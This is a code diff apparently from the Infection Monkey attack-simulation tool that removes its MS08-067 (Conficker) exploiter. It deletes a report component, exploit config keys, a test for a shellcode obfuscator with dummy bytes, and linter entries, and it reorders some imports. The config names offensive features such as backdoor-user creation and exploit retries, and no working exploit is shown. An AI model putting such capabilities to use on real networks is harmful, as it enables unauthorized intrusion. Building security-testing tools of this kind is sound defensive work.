@ -1,24 +0,0 @@
|
||||||
import React from 'react';
|
|
||||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
|
||||||
|
|
||||||
export function ms08_067IssueOverview() {
|
|
||||||
return (<li>Machines are vulnerable to ‘Conficker’ (<a
|
|
||||||
href="https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067"
|
|
||||||
>MS08-067</a>). </li>)
|
|
||||||
}
|
|
||||||
|
|
||||||
export function ms08_067IssueReport(issue) {
|
|
||||||
return (
|
|
||||||
<>
|
|
||||||
Install the latest Windows updates or upgrade to a newer operating system.
|
|
||||||
<CollapsibleWellComponent>
|
|
||||||
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
|
|
||||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
|
|
||||||
className="badge badge-danger">Conficker</span> attack.
|
|
||||||
<br/>
|
|
||||||
The attack was made possible because the target machine used an outdated and unpatched operating system
|
|
||||||
vulnerable to Conficker.
|
|
||||||
</CollapsibleWellComponent>
|
|
||||||
</>
|
|
||||||
);
|
|
||||||
}
|
|
|
@ -76,7 +76,6 @@
|
||||||
"max_depth": null,
|
"max_depth": null,
|
||||||
"monkey_log_path_linux": "/tmp/user-1563",
|
"monkey_log_path_linux": "/tmp/user-1563",
|
||||||
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
||||||
"ms08_067_exploit_attempts": 5,
|
|
||||||
"ping_scan_timeout": 1000,
|
"ping_scan_timeout": 1000,
|
||||||
"post_breach_actions": [
|
"post_breach_actions": [
|
||||||
"CommunicateAsBackdoorUser",
|
"CommunicateAsBackdoorUser",
|
||||||
|
@ -120,6 +119,5 @@
|
||||||
3306,
|
3306,
|
||||||
7001,
|
7001,
|
||||||
8088
|
8088
|
||||||
],
|
]
|
||||||
"user_to_add": "Monkey_IUSER_SUPPORT"
|
|
||||||
}
|
}
|
||||||
|
|
|
@ -121,10 +121,6 @@
|
||||||
"exploit_ssh_keys": [],
|
"exploit_ssh_keys": [],
|
||||||
"general": {
|
"general": {
|
||||||
"skip_exploit_if_file_exist": false
|
"skip_exploit_if_file_exist": false
|
||||||
},
|
|
||||||
"ms08_067": {
|
|
||||||
"ms08_067_exploit_attempts": 5,
|
|
||||||
"user_to_add": "Monkey_IUSER_SUPPORT"
|
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
"testing": {
|
"testing": {
|
||||||
|
|
|
@ -1,14 +0,0 @@
|
||||||
from unittest import TestCase
|
|
||||||
|
|
||||||
from common.utils.shellcode_obfuscator import clarify, obfuscate
|
|
||||||
|
|
||||||
SHELLCODE = b"1234567890abcd"
|
|
||||||
OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^="
|
|
||||||
|
|
||||||
|
|
||||||
class TestShellcodeObfuscator(TestCase):
|
|
||||||
def test_obfuscate(self):
|
|
||||||
assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE
|
|
||||||
|
|
||||||
def test_clarify(self):
|
|
||||||
assert clarify(OBFUSCATED_SHELLCODE) == SHELLCODE
|
|
|
@ -11,12 +11,9 @@ from infection_monkey.i_puppet import (
|
||||||
PortStatus,
|
PortStatus,
|
||||||
)
|
)
|
||||||
from infection_monkey.master import IPScanResults, Propagator
|
from infection_monkey.master import IPScanResults, Propagator
|
||||||
from infection_monkey.network import NetworkInterface
|
|
||||||
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
|
||||||
from infection_monkey.model import VictimHost, VictimHostFactory
|
from infection_monkey.model import VictimHost, VictimHostFactory
|
||||||
from infection_monkey.network import NetworkAddress
|
from infection_monkey.network import NetworkAddress, NetworkInterface
|
||||||
|
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
|
|
|
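Review bot: The import reshuffle in this hunk is a sort-order cleanup unrelated to the MS08-067 removal: `NetworkInterface` is folded into the existing `from infection_monkey.network import NetworkAddress, NetworkInterface` line and `ExploitTelem` moves below the `model` import. Nothing MS08-067-related is visible in these lines, so the change appears cosmetic; if it is needed to satisfy the import linter, a one-line mention in the PR description would save the next reader from looking for a functional reason. The import block this hunk edits starts before the hunk.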
@ -59,7 +59,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
|
||||||
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
||||||
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
||||||
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
|
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
|
||||||
MS08_067 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:35)
|
|
||||||
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
|
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
|
||||||
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
||||||
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
||||||
|
@ -129,7 +128,6 @@ ts # unused variable (monkey/infection_monkey/exploit/zerologon_utils/options.p
|
||||||
opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
|
opnum # unused variable (monkey/infection_monkey/exploit/zerologon.py:466)
|
||||||
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
|
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:467)
|
||||||
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
|
structure # unused variable (monkey/infection_monkey/exploit/zerologon.py:478)
|
||||||
_._port # unused attribute (monkey/infection_monkey/exploit/win_ms08_067.py:123)
|
|
||||||
oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
|
oid_set # unused variable (monkey/infection_monkey/exploit/tools/wmi_tools.py:96)
|
||||||
export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282)
|
export_monkey_telems # unused variable (monkey/infection_monkey/config.py:282)
|
||||||
NoInternetError # unused class (monkey/common/utils/exceptions.py:33)
|
NoInternetError # unused class (monkey/common/utils/exceptions.py:33)
|
||||||
|
|
Loading…
Reference in New Issue